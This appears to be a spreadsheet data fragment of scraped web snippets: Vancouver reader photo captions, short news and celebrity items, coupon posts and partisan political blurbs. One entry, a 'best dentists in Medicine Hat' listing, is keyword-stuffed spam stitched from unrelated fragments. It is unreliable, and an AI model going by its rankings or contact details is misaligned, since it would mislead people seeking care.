Canada on a flight from YYZ to YVR | 7:00am Reader G.T. | Looking west over Stanley Park from Coal Harbour | 5:00pm Reader C.F. | Chancery Place | Vancouver, BC | 10:30am Reader K.T. | Beatty Street | Yaletown | Vancouver, BC | 6:30am Reader J.S. | Somewhere Over The Rocky Mountains | 7pm Reader V.R. | Hotel Vancouver as seen from an office across the street | 3:30pm Reader R.R. | Main at 16th | Vancouver, BC | 12:26pm Reader A.T. | Seabus crossing Burrard Inlet | Vancouver, BC | 4:30pm Reader A.T. | Mount Pleasant | Vancouver, BC | 8:20am Reader A.T. | Mount Pleasant | Vancouver, BC | 8:29pm Reader C.C. | Mustique Island | St. Vincent &amp; The Grenadines | 9:30pm Reader S.B. | Wall St. | East Vancouver | 4:00pm Reader K.K. | Early morning flight from Vancouver to Kelowna | 8:00am Reader C.W. | East 4th Ave. at Commercial Drive | 3:29pm A.M. | The Marais (with peekaboo Pompidou Centre) | Paris, France | 9:00am A.N. | Fairview Slopes | Vancouver, BC | 9:30pm I.F. | In a small cottage in the village of Topola, Serbia | 12:00pm A.M. | State Line, Oregon &amp; California | 8pm Reader K.Q. | Waiting for my float plane | Ganges Harbour, Saltspring island | 7am Reader W.U. | Canmore, Alberta | 7:30am Reader K.K. | Lighthouse Pub | Nanaimo Harbour, BC | 4:58pm IMAG0678 Reader T.R. | Flying into Vancouver from Victoria | 8:00am Reader A.J. | Above Coal Harbour | 9:14am | South Granville | Vancouver, BC A.M. | Sun Tower | 12:55pm M.B. | 2:30pm | Port Kells, BC L.G. | The West End | 8:00am Reader M.C. | Passing by Livingston Island, Antarctica | 9:33am Reader H.S. | Boulevard Garibaldi | Paris, France | 4:30pm Reader A. F | False Creek | 7:45am Readers F.C. &amp; C.W. | Bidwell St. | English Bay | Vancouver, BC | 7:20pm Reader D.A. | Sunrise in Mount Pleasant | Vancouver, BC | 8pm Reader J.C. | Scout on the Goondocks | Astoria, OR | 3pm T.R. | From the bar, 52 stories up in The Shard | London, UK | 7pm Reader T.G. | Mount Pleasant near Main &amp; Broadway | Vancouver, BC | 7am Submitted by M.C.S. | BC Ferries porthole, The Salish Sea | 5pm Submitted by L.F | Montreal, QC | 1pm Submitted by J.S | Gastown, Vancouver, BC | 6:45am Submitted by K.M | East Vancouver Submitted by I.W. | Miami, Florida | 4:30pm Submitted by B.C. | Dominion Building. Vancouver, BC | 3:30pm Submitted by P.G. | Railtown | Vancouver, BC | 9:30am Submitted by R.B | 'Above Granville Street' | 4:33pm Submitted by S.B. | Viti Wines, Vancouver, BC | 11:30am Submitted by M.S. | East Vancouver, BC | 12:20pm Submitted by J.W. | Kits Point | Vancouver, BC | 9:20pm Submitted by D.D. | Taken in slightly better weather at UBC | 8:13pm Submitted by J.W. | East 2nd Ave and McLean Drive | 6:30pm Submitted by A &amp; R | Waikiki, Hawaii | 11:30pm Submitted by H.B. | Burrard &amp; Pender | 1:08pm Submitted by M.M. | Southpointe Academy | 11:49am Submitted by M.S. | 15th floor of the Shangri-La Hotel | 8:30am Submitted by J.A. | Wickaninnish Inn, Tofino, BC | 10:30am Submitted by K.L. | East Hastings St., Vancouver, BC | 8:38pm Submitted by M.D. | 675 W. Hastings, "Limited time only as 40 storey Bosa building coming up in front." | 7:27am Submitted by 'L' | Idaho Peak, New Denver, BC | 5:30pm Submitted by A.J.S | 6th Ave. and Granville St. | 7:40pm Reader F.L. | Fogo, Fogo Island, Newfoundland | 8:48 PM (NDT) Submitted by M.C.S. | Balsam St., Kitsilano | 9:20pm Submitted by F.T. | Woodlark Hotel | Portland, OR | 9pm Submitted by L.L. | Sage Hills Winery, Summerland, BC | 3pm Submitted by H.K. | Sisters, Oregon | 5pm Submitted by K.D. | Fairview, Vancouver | 3:27pm Submitted by H.H. | Strathcona, Vancouver | 10pm Submitted by A.F. | Coal Harbour, Vancouver | 6pm Submitted by S.K.S. | Mt. Pleasant, Vancouver | 8:30pm Submitted by P.G. | Downtown Vancouver | 7pm Submitted by N.T. | Philadelphia, Pennsylvania | 7am Submitted by J.R. | Chinatown, Vancouver | 1:45pm Submitted by T.S. | Driving northbound on Burrard Bridge, Vancouver | 2pm Submitted by R.A. | Chow time on set | Burnaby, BC | 4:14pm</t>
  </si>
  <si>
    <t>.@JoeBiden on his gaffes: “I don’t get wrong things like, ‘we should lock kids up in cages.’” #LSSC pic.twitter.com/Nt3e0IhA6C — The Late Show (@colbertlateshow) September 5, 2019 Biden of course was VP when the ‘cages’ were built and kids were turned over to human traffickers. Via Free Beacon: Former Vice President Joe Biden addressed criticisms […]</t>
  </si>
  <si>
    <t>Folks on social media are flipping out over the Chicago Bulls’ logo. That’s because they think the image of the angry bull, when turned upside down, looks a bit NSFW. Check it out here: Only the Illuminati are supposed to know this ancient Truth. — Chewiechipsahoy (@Crapplefratz) September 14, 2019 To be fair, the team’s original name was the Chicago Crab Sex Robots, but when that got nixed they had to save money on a name change and new logo. — Greg Pliska (@gregpliska) September 15, 2019 This is why we can’t have nice things. — Teapot Dome was Amateur Hour! (@HarrenGWarding) September 14, 2019 When Tim Berners-Lee invented the Internet, this … this exact tweet … was what he dreamed it would one day produce. #Blessed — Robb Badlam (@BuckyUnderbelly) September 14, 2019 I thought of a robot, sitting in a chair, reading a book. Either I read too much or you’re overly fond of crabs — Patch Zircher (@PatrickZircher) September 14, 2019 Source link</t>
  </si>
  <si>
    <t>Jonathan Jarvis</t>
  </si>
  <si>
    <t>Rafa Benitez has claimed that he understands the “disappointment” of Newcastle United fans at the moment. The Spaniard left Tyneside over the summer after failing to agree terms on a new deal with the club, and has hinted that he has sympathy for supporters as some conduct boycotts. The Magpies’ most recent home crowd, against Brighton last Saturday evening, was their lowest for... Source</t>
  </si>
  <si>
    <t>Jordan Crawford working out in UCLA in front of NBA scouts Original Source Free agent shooting guard Jordan Crawford could have another shot at the NBA. Crawford, who spent the previous season with the Sichaun Blue Whales of the Chinese Basketball Association (CBA), is reportedly set to work out in front of NBA scouts at UCLA, per Ben Stinar of Amico Hoops. The 30-year-old guard averaged 36.5 points per game in the past year in the CBA. Jordan Crawford has recently been playing in front of NBA scouts at UCLA and remains in great shape, per source. Crawford is still just 30 years old and averaged 36.5 PPG in China last season. Could give an NBA team instant offense off of the bench. pic.twitter.com/UQGP8w4I4F — Ben Stinar (@BenStinar) September 3, 2019 Crawford was drafted 27th overall by the Brooklyn Nets (then New Jersey Nets) in the 2010 NBA Draft. However, his draft rights were later traded to the Atlanta Hawks, where he spent the first one and half year of his career. Overall, he has played six seasons in the NBA from 2010 to 2018 with five different teams, namely the Hawks, Washington Wizards, Boston Celtics, Golden State Warriors and New Orleans Pelicans. Crawford was a valuable scorer during his NBA tenure, averaging 12.2 points, 2.5 rebounds and 3.1 assists in 281 games playes. His best all-around scoring campaign came as a member of the Wizards in 2011-12 when he logged 14.7 points per game, 2.6 boards and 3.0 assists while shooting 40.0 percent from the field. NBA franchises are always looking to add shooting, depth and shot-creation in the backcourt, and Jordan Crawford could be the boost that some team are looking for. Shaq’s Savage Reaction To Dwight Howard Joining Lakers | CP NBA Pod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‘819338648198169’); fbq(‘track’, “PageView”); fbq(‘track’, ‘ViewContent’);(function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.4”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Jordan Crawford working out in UCLA in front of NBA scouts appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>The Taliban has claimed responsibility for a car bomb explosion that rocked the Afghan capital Kabul, killing at least five people and wounding dozens more, and shaking windows and doors in houses several kilometres away from the blast.</t>
  </si>
  <si>
    <t>Don’t accuse Ariana Grande of not singing live because the singer will come to your living room just to prove a point. The “thank u, next” singer hit back at someone who said that Grande sounded like she was using autotune during a performance of her song, “Breathin” during her Sweetener tour. “It sounds like autotune and probably not live. I mean you are a great singer and I love your voice and songs but this doesn’t sound live,” the commenter wrote in an exchange captured by Comments by Celebs. “With all due respect, I could do this in your living room for you, fam,” Grande responded. “With no sound mixing or help at all. I could do it on Broadway (and did). I can do it in the shower. In the car. It’s my gift, it’s why I’m here.” “I sing 30+ songs a night,” the singer added. “Every word. It’s my thing. Let me shine like damn.” Fellow users loved Grande’s slam and voiced their support for the artist. “Imagine living in 2019 and thinking Ariana Grande can’t hit those notes,” one fan wrote, while another added “Y’all please stop coming for the vocalist of this generation.” One commenter did think that the original accusation of Grande was correct though, writing “There is distortion here, this is not a naturally occurring human vocal sound. The original commenter is correct.” Kevin Mazur via Getty Images Grande performs on stage during her “Sweetener World Tour” at the O2 Arena on Aug. 17 in London. A few months ago, Grande defended her friend, Justin Bieber, from lip-synching accusations when the two performed an impromptu set together at Coachella in April. Bieber countered accusations from E! host Morgan Stewart, and Grande later joined in to back him up in a since-deleted tweet. “We also decided to do this ten minutes before my set started,” Grande wrote of the set. “We had 0 soundcheck, 0 rehearsal. u were singing with the back tracking like most cameos do. people are bored. people don’t know how it feels to be under such scrutiny. the world was happy to have u on stage again.” Source link</t>
  </si>
  <si>
    <t>According to breaking news this morning: The National Rifle Association acted as a “foreign asset” for Russia in the period leading up to the 2016 election, according to a new investigation unveiled Friday by Sen. Ron Wyden, D-Ore. Drawing on contemporaneous emails and private interviews, an 18-month probe by the Senate Finance Committee’s Democratic staff found that the NRA underwrote political access for Russian nationals Maria Butina and Alexander Torshin more than previously known — even though the two had declared their ties to the Kremlin. The report, available here, also describes how closely the gun rights group was involved with organizing a 2015 visit by some of its leaders to Moscow. Appalling, right? And that’s on top of all the other bad stuff the NRA does. So presumably, no politician would want the NRA’s money, right? Except, that is, for…lots of Republicans, including Virginia Republicans such as the following (see screen shots from VPAP, below). First off, note that the NRA has given $262,080 to Virginia politicians in 2017-2019 — ALL OF WHICH went to Republicans. Second, check out the long list of Virginia Republican recipients of NRA cash, including ones in tough races this cycle like House Speaker Kirk Cox, State Sen. Bryce Reeves, Sen. Jill Vogel, Del. Tim Hugo, former Del. Rich Anderson, Del. Glenn Davis, Del. Chris Jones, former Del. Rocky Holcomb, Del. Dave LaRock, former Del. Randy Minchew, Del. Roxann Robinson, Del. Chris Stolle, Del. David Yancey, etc. Please make sure you support the Democratic opponents – Sheila Bynum-Coleman, Amy Laufer, Ronnie Ross, Dan Helmer, Del. Hala Ayala, Karen Mallard, Clint Jenkins, Alex Askew, Mavis Taintor, Del. Del. Wendy Gooditis, Larry Barnett, Nancy Guy, Shelly Simonds, etc. to all the aforementioned, as well as everyone else on this list.</t>
  </si>
  <si>
    <t>panthastoneco</t>
  </si>
  <si>
    <t>20% OFF Sitewide at Pantha &amp; Stone Co. Use code: PANTHA20 at the checkout to claim your discount. FREE Shipping within Australia. Code valid until Sunday, 7 September.</t>
  </si>
  <si>
    <t>James Masson</t>
  </si>
  <si>
    <t>Cancer patient Lily Douglas and her family are celebrating after the youngster’s latest scans were found to be stable.</t>
  </si>
  <si>
    <t>One of the new changes in Apple CarPlay is dual screen support, and its one of the biggest changes that I wish could be rolled back. My c... The Apple CarPlay Dual Screen function in iOS 13 should be a setting</t>
  </si>
  <si>
    <t>PEAKY BLINDERS came to a thrilling end last night but as Tommy Shelby’s plan went wrong, it seems the reason why was close to home with Finn Shelby’s silly mistake – will he die for it? Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Frances Rougvie</t>
  </si>
  <si>
    <t>A show celebrating the music of George Michael will stop at Dundee's Caird Hall for one night.</t>
  </si>
  <si>
    <t>Flower Mound, Texas News GoFundMe PULLS UBS banker Scott Hapgood’s $250K legal fund amid manslaughter trial in Anguilla Robert De Niro is ‘anxious’ as a new book based on his dad’s journals is set to be released Las Vegas mass murderer Stephen Paddock’s Australian girlfriend found peace in LA after shooting How Woody Harrelson’s ‘SNL’ Monologue Comments on the State of Comedy (Watch) SNL takes aim at old Bernie Sanders and ‘out of touch’ Joe Biden Democrat candidates in ‘town hall’ Wall Street mogul promised Chicago PD star Marina Squerciati ‘surprise’ in will then left nothing Jon Bon Jovi says Sen. Cory Booker is ‘the right leader for this moment’ in fundraising email GoFundMe PULLS UBS banker Scott Hapgood’s $250K legal fund amid manslaughter trial in Anguilla Posted: 28 Sep 2019 11:22 PM PDT Connecticut man Scott Hapgood, 44, must sign a ‘declaration under threat of perjury’ that the $250,000 donations won’t be used to pay for his legal defense in Anguilla after killing Kenny Mitchel in April. via https://youtu.be/mFQfuwZZ8h8 Robert De Niro is ‘anxious’ as a new book based on his dad’s journals is set to be released Posted: 28 Sep 2019 11:12 PM PDT Robert De Niro revealed he is action about reading his late father, Robert De Niro Sr.’, personal journals that reveal his father’s struggles with finances, mental health, artist recognition and sexuality via https://youtu.be/mFQfuwZZ8h8 Las Vegas mass murderer Stephen Paddock’s Australian girlfriend found peace in LA after shooting Posted: 28 Sep 2019 11:12 PM PDT Dual-Australian citizen Marilou Danley dated Stephen Paddock for four years before he opened fire on more than 20,000 country music fans from a hotel suite in Las Vegas on October 1, 2017. via https://youtu.be/mFQfuwZZ8h8 How Woody Harrelson’s ‘SNL’ Monologue Comments on the State of Comedy (Watch) Posted: 28 Sep 2019 10:23 PM PDT Before “Saturday Night Live” debuted its 45th season, it was already making major headlines with its decision to hire Shane Gillis, a comedian and podcaster who, just months before booking this high profile gig, had been using racial slurs online. Just days after he was hired, he was fired from the late-night NBC sketch comedy […] via https://youtu.be/mFQfuwZZ8h8 SNL takes aim at old Bernie Sanders and ‘out of touch’ Joe Biden Democrat candidates in ‘town hall’ Posted: 28 Sep 2019 10:12 PM PDT Saturday Night Live poked fun at Democratic candidates as it returned to screens this weekend, highlighting Bernie Sanders age and Joe Biden reputation for being ‘out of touch’. via https://youtu.be/mFQfuwZZ8h8 Wall Street mogul promised Chicago PD star Marina Squerciati ‘surprise’ in will then left nothing Posted: 28 Sep 2019 10:12 PM PDT A new court filing designed to prevent the mistress of John R. Jakobson from testifying that he promised to leave Chicago PD actress Marina Squerciati some of his $100million fortune, states the Wall Street mogul said she would get a ‘big surprise’ in his will. via https://youtu.be/mFQfuwZZ8h8 Jon Bon Jovi says Sen. Cory Booker is ‘the right leader for this moment’ in fundraising email Posted: 28 Sep 2019 10:02 PM PDT Jon Bon Jovi’s email was sent to Sen. Cory Booker’s supporters Saturday, during a final push to raise the $1.7million needed for him to stay in the 2020 Democratic candidate nominee race. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>Tom Cruise has welcomed Hayley Atwell to the team. See full article at Film-news.co.uk » The post Hayley Atwell joins Mission: Impossible 7 appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Mary Ward</t>
  </si>
  <si>
    <t>'It's not like you're born with it and you're stuck with it forever.'</t>
  </si>
  <si>
    <t>Josh Kolm</t>
  </si>
  <si>
    <t>A favourability study finds the vast majority of Canadians don't know enough about the companies to have an opinion on them. Read More</t>
  </si>
  <si>
    <t>Homan gives her a talking-to for demonizing and endangering law enforcement. WATCH: AOC shouts at former ICE head Thomas Homan and slams gavel at him while he GOES OFF on her for attacking ICE. "In my 34 years, I've never seen such hate toward a law enforcement agency in my life that you want to […]</t>
  </si>
  <si>
    <t>Philip G. Pavely-USA TODAY Sports The Pittsburgh Steelers need a win in a bad way, and former head coach Bill Cowher suggests the team is only going to get better as the season progresses. With every loss Mike Tomlin suffers it seems as though the Pittsburgh Steelers fan base longs more and more for Bill Cowher. And I’m sure if the internet were around when Cowher took over for Noll, fans were probably pining for ‘The Emperor’ and his stoic mentality on the sideline. This will Cowher ran up and down with the energy of an NFL rookie. In other words, when Cowher speaks on the current Steelers team, it makes people’s ears perk up. They want to know what the old ball coach thinks of the team, and no, not just what he says on his CBS gig every Sunday before the games. With the 2019 Steelers staring at an 0-3 record heading into their Week 4 game vs. the Cincinnati Bengals, an event where Cowher will be inducted into the Steelers’ Hall of Honor, he spoke about the current team. Check out what he had to say: “I think they’re going to get better as the season goes along,” Cowher told Jim Wexell via Steelers.com. “You see a lot of breakdowns right now, but that’s part of the growing pains that you have to go through when you have new players playing with each other. So I think they’ll get better as the season goes along. It’s a great opportunity right now for Mason and that offense. They need some people to step up and see what their roles can be, and then you start to play to those strengths.” It was refreshing to read Cowher’s comments, because they are 100% true. The Steelers will take some time to gel, with the hope it doesn’t take too much time for them to become a competitive and cohesive unit. When you look at the roster on both ends, it is riddled with young talent in dire need of experience to help them take their individual games to the next level. On top of that, when Cowher says some people need to ‘step up’, he again is absolutely spot on. There are players on this team, players like Cameron Heyward and the offensive line, who need to up their game. We have all seen them play at such a high level, but for whatever reason the product being put on the field thus far has been extremely sub-par. The bottom line is the Steelers are still searching for answers. Everywhere from the quarterback to the defensive backs there are unknowns across the roster. Like Cowher says, they will get better, but when? Will they be able to turn the corner on Monday Night Football and get the first win of 2019? Or will this be a season-long roller coaster ride filled with peaks and valleys? For the fan base, they want the team to get right in the worst way, and to see what some of these young talents, like Mason Rudolph, can do when given the opportunity. The opportunity is knocking, but will they answer? Only time will tell…</t>
  </si>
  <si>
    <t>A new study revealed that while hardworking Americans are earning more vacation days, they’re not spending them. The study by U.S. Travel Association, Oxford Economics, and Ipsos looked at 1,025 responses from American workers aged over 18 who worked more than 35 hours a week. The researchers also drew from Bureau of Labor Statistics (BLS) and Bureau of Economic Analysis (BEA) employment data. The study extrapolated that the around 150 million Americans in the workforce collectively left an estimated 768 million days unused last year, up 9% from the year before. U.S. Travel estimates that this comes out to about 8 days per person. And out of those unused days, 236 million were “forfeited completely,” the report stated, which resulted in $65.5 billion in lost benefits. The research noted that 55% of respondents said they did not use all their allotted time off, with the key reason for the 9% increase in unused days being that “the number of earned days is increasing faster than paid time off days used.” Reuters ‘Broader economic cost’ of forgoing vacations In other words, while American workers are earning more paid time off — 23.9 days of paid time off in 2018 as compared to 23.2 days in the year before — they aren’t exactly taking advantage of the increased number of days available to them. The forgone days have a “broader economic cost,” the study stated. If Americans used just over half of their 768 million unused days to travel, according to the researchers’ estimates, it could add $151.5 billion in additional travel spending and two million American jobs. The study’s findings highlight an interesting irony, especially since the U.S. has ranked as the only developed economy that doesn’t guarantee its workers paid vacation. Countries in Europe, because of European Union regulation, have to give employees at least 4 weeks — or 20 working days — of paid vacation for all workers employed in EU member countries. Statista ‘Too hard to get away from work’ The report also revealed that millennials found it hard to take time off to travel for one big reason: cost. In the survey, 73% of millennials cited cost as the top barrier for travel, compared to 68% of Gen X and 63% of Baby Boomers. Another big barrier that millennials cited was the fact that it was “too hard to get away from work.” Gen X and Baby Boomers, on the other hand, cited air travel and driving hassles as some of the main things that discouraged them from traveling. Shannon Stapleton / Reuters Using vacation vs paid time off Different sectors of American workers revealed some industry vacation trends in the study. For instance, the report found that Americans working in tech, media, and the IT sector preferred to use their paid time off to travel instead of using vacation days. Paid time off can generally be used for other things like sick days, personal time off, jury duty, and so on, apart from vacation. Workers in finance and insurance, on the other hand, took actual vacation days to travel. And that group averaged the most vacation days for travel at 15.6 days, the study found. Aarthi is a writer for Yahoo Finance. Follow her on Twitter @aarthiswami. Source link</t>
  </si>
  <si>
    <t>Finals fever has hit and the Monday Bunker crew will dissect who wins this weekend and why?</t>
  </si>
  <si>
    <t>Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Medicine Hat. We’re the original doctor ratings site with over 2 million reviews. The Best Dentists in Medicine Hat Handpicked Top 3 Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to. The Best Children Dentists in Medicine Hat Handpicked Top 3 Children Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock Verified Outstanding Staff World Class Punctuality Exceptionally Helpful Highly Knowledgeable Dentist. See here the whole list of our best Dentists from Medicine Hat and their surroundings reviewed by StarOfService community from Medicine Hat – Alberta. Do you want to know who is in the top 100 ? Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Thank You Medicine Hat for voting and making us "The Best Dental Practice in Medicine Hat" 5 years in a row!!. Number 1 Dental Clinic Near Medicine Hat Mona Fong Dental Clinic 1/F, Mona Fong Clinic, 23 Man Nin Street, Sai Kung 2163 9250 Thursday PM Accessible Entrance Lift Tactile Guide Path Tai Po Wong Siu Ching Dental Clinic 1 Po Wu Lane, Tai Po 2652 3737 Thursday AM Lift Fanling Health. Crestwood dentists in Medicine Hat provide a range of restorative and Number 1 Dentist Near Medicine Hat Phone number (403) 504-5093 Send to your Phone Photo of Galvin Dental – Medicine Hat, AB, Canada Add Photos Rating 1 (Eek ! Methinks not. The number of obstetric. Medical Practitioners and Dentists Council report, there are 7,974 doctors and 838 dentists in. Meanwhile, Ramsay had a strong year in the SJHL for the Broncos, At Stardust Alley Vintage Vinyl Records, sale of 78 rpm records (50 percent off for people who wear Victorian/early 1900s hat. Top Herbs for Hashimoto’s – In this article, you will discover: Why herbs are used in functional medicine How herbs can address your Hashimoto. Did. Bob Dylan: Our 1985 Cover Story – We’re still always best of friends. I once read a book of Nathaniel Hawthorne. Pete is almost like a tribal medicine man, The Best Cosmetic Dentists in Medicine Hat Handpicked Top 3 Cosmetic Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Highest Rated Dental Clinic Near Medicine Hat Alberta At Courtyard Dental Centre in Medicine Hat, we provide all the services you need for a healthy, sparkling smile. At our family dentistry clinic, we treat patients of all. At Courtyard Dental Centre in Medicine Hat, we provide all the services. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Medicine Hat. Find the best Dentist in Medicine Hat, AB. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local. The Best Dentists in Medicine Hat Handpicked Top 3 Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence.</t>
  </si>
  <si>
    <t>Walker died in a car accident in 2013. See full article at Film-news.co.uk » The post Dwayne Johnson shares rare tribute to late pal Paul Walker appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>A spokesman for the Yemeni military group says the Iran-aligned movement had captured "thousands" of troops, including officers and soldiers of the Saudi army, as well as hundreds of armoured vehicles.</t>
  </si>
  <si>
    <t>The Taliban launched an attack on a second Afghan city in as many days even as a United States envoy says the US and the Taliban are "at the threshold of an agreement" to end America's longest war.</t>
  </si>
  <si>
    <t>Jon Brady</t>
  </si>
  <si>
    <t>Dundee City Council is exploring how it can meet tough emission targets ahead of time as it seeks to achieve carbon neutrality by 2045.</t>
  </si>
  <si>
    <t>McMaster University associate political science professor Peter Graefe said while it is important for all governments to communicate with citizens, there is a line between information and partisan self-promotion.</t>
  </si>
  <si>
    <t>Michael B. Jordan stars in and produces his next film, Just Mercy. See full article at Film-news.co.uk » The post Michael B. Jordan plans to quit acting and direct movies instead appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>The country's consumer watchdog says there is poor disclosure of the benefits of certain loyalty schemes and how people's data is shared.</t>
  </si>
  <si>
    <t>Owen Jacques</t>
  </si>
  <si>
    <t>A 25-year-old man lures two boys to a secluded location and offers to pay them $5 for oral sex, just months after he was given bail for possessing graphic and violent child porn material, a court hears.</t>
  </si>
  <si>
    <t>Sarah Danckert</t>
  </si>
  <si>
    <t>The company targeted vulnerable customers in remote Indigenous communities.</t>
  </si>
  <si>
    <t>Archaeological Site of Tula, Mexico. Toltec civilisation. The post Archaeological Site of Tula, Mexico appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>cramsport86</t>
  </si>
  <si>
    <t>30% for all pillows at Chaba Australia Store. From $16 for duck down pillow, luxury hotel microfibre antibacterial pillows. Use coupon : 30PILLOWS Chaba luxury hotel microfibre antibacterial pillow size 48×73 with 100% micro cotton antibacterial 1.4DX38mm-Nano silver antibacterial nano-silver technology. Components and standards of outerwear: T233- 100% Cotton Smooth taflon Yarn size 60SX40S Weaving specifications: square woven 100/133 density 233 knots / 2.54 cm2 Fiber surface: Brush thoroughly against ruffled, scratched, anti-fur Maximum fabric size: 290cm / fabric weight 300grs / m2 Sewing specifications: Sewing bags Needle line: Sewing thread density 5 nose / 1cm Elasticity ratio: 2-2.5% / 1 meter horizontal gauge after 15 washings Cotton weight: : 1200gr Made in Viet Nam Conform to the European standard OEKO-TEX100 Standard Conform to American standards: US AATCC Warranty: standard washing mode Warranty 100 times washing or 1 year.</t>
  </si>
  <si>
    <t>BBC News - Family &amp; Education</t>
  </si>
  <si>
    <t>Social-mobility campaigners say poorer families need fairer access to extra lessons from tutors. The post Quarter of secondary pupils ‘get private tuition’ appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/interface/2019/9/24/20880254/youtube-ceo-apology-creators-verification-status-twitter-instagram-snap YouTube is only the latest platform to botch its verification program Illustration by Alex Castro / The Verge The modern-day verified social media account was born in June 2009, when the manager of the St. Louis Cardinals sued Twitter because someone had created an account to impersonate him. In the years since, the question of what verification should mean — and who should be eligible to be verified — has bedeviled every social network that’s ever attempted to do it. The problems with Twitter’s program have long been evident. The process to become verified was, and still remains, opaque; and Twitter began removing verification badges from people who had behaved badly in the real world, causing many people to conflate verification with some kind of moral endorsement. More recently, Twitter said it had “paused” the program so it could work out… Continue reading… Source: https://www.theverge.com/interface/2019/9/24/20880254/youtube-ceo-apology-creators-verification-status-twitter-instagram-snap The post YouTube is only the latest platform to botch its verification program appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Certain ETFs won’t be subject to the cost and delay of an exemptive order The post New SEC rules make it easier for ETFs to come to market appeared first on Advisor.</t>
  </si>
  <si>
    <t>Ryan Sheckler invites the world’s best skateboarders to a one-of-a-kind street course in Detroit’s Hart Plaza. ► Watch more skateboarding videos in this playlist: https://www.youtube.com/playlist?list=PLnuf8iyXggLE33D-oGAMwslK46tFT0mNQ ► Skate All Day on Red Bull TV: https://www.redbull.com/int-en/tv/collection/playlists::b962b167-7011-47ac-bdf5-a6ee86acfb9e Returning for its third year with an improved course layout, Hart Lines will have even more room for skaters to stomp […] The post Hart Lines 2017 FULL TV EPISODE | Red Bull Signature Series appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Arnold Schwarzenegger, Linda Hamilton and Edward Furlong are reuniting for the upcoming movie. See full article at Film-news.co.uk » The post Terminator: Dark Fate team initially shot tamer versions of each scene appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Social media statistics from this past weekend suggest Nurmagomedov’s popularity is noticeably lower when he’s not involved with former champion and bitter rival Conor McGregor. Source: Sports Business News</t>
  </si>
  <si>
    <t>fplhints</t>
  </si>
  <si>
    <t>At this early stage of the season, differential options continue to prove their importance to Fantasy Premier League ...</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/internet-week-235 Trump’s Hurricane Plan Tops This Week’s Internet News Roundup The answer, dear reader, is no. Plus: Amazon on fire, Hong Kong in turmoil, genes for queerness, and more. Source: https://www.wired.com/story/internet-week-235 The post Trump’s Hurricane Plan Tops This Week’s Internet News Roundup appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Clancy Yeates</t>
  </si>
  <si>
    <t>The new head of BoQ grew up in a housing commission rental property in Darwin, before climbing the banking corporate ladder.</t>
  </si>
  <si>
    <t>Investigation to focus on issues including executive pay, accounting and role of auditorsMPs are to hold an inquiry into the role of “corporate greed” in the collapse of Thomas Cook, focusing on directors’ stewardship of the company, how much they were paid and how its accounts were prepared and signed off by auditors.As the business, energy and industrial strategy committee announced the wide-ranging inquiry, the business secretary, Andrea Leadsom, set up a taskforce to help those affected by the corporate failure, but has been accused of “shutting the stable door after the horse has bolted”. Continue reading… Read More</t>
  </si>
  <si>
    <t>PRINCE HARRY continues his solo tour in central Africa today after paying a deeply emotional visit to the former landmine field his late mother Princess Diana walked through more than 20 years ago. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>30% off selected items on the Jeanswest eBay store and free delivery. They also have other sales in their "brick and mortar" stores, with a lot more items, and up to 50% off https://www.ozbargain.com.au/node/484945</t>
  </si>
  <si>
    <t>bailbondsh</t>
  </si>
  <si>
    <t>The cheap deal on this is back! Very good deal for one of the best albums of the 60's, let alone all time! Product description THE KINKS ARE THE VILLAGE GREEN PRESERVATION SOCIETY 50th ANNIVERSARY SUPER DELUXE BOX SET - 2018 REMASTER This lavishly packaged super-deluxe box set is part of the BMG 'Art Of The Album' series, which focuses specifically on high quality, bespoke packaged re-issues of seminal albums within the BMG catalogue, offering the highest spec audio masters and original artwork. The set contains remastered original LPs, CDs of the remastered original albums plus a wealth of unreleased bonus material, reproduced 7" singles, deluxe hardback photo book with comprehensive notes and new band interviews, and reproduced original memorabilia. Somewhat overlooked upon its release in November 1968, The Kinks Are The Village Green Preservation Society is now seen as one of the best British albums ever recorded. Created in difficult circumstances by a band who refused to follow fashion, it is an album of timeless, perfectly crafted songs about growing up and growing old, and the decline of national culture and traditional ways. Enduring and unsurpassed, with its wit, sadness, quiet anger, regret and charm, it is generally considered the high point of The Kinks' outstanding career and Ray Davies' masterpiece. A calm, nostalgic album which feels like a sweet, hazy dream but with endless layers of musical and lyrical innovation, The Village Green Preservation Society's defiantly British sensibilities became the foundation of generations of British guitar pop. God Save The Village Green! Note from the label: Please contact info.uk@bmg.com with your order 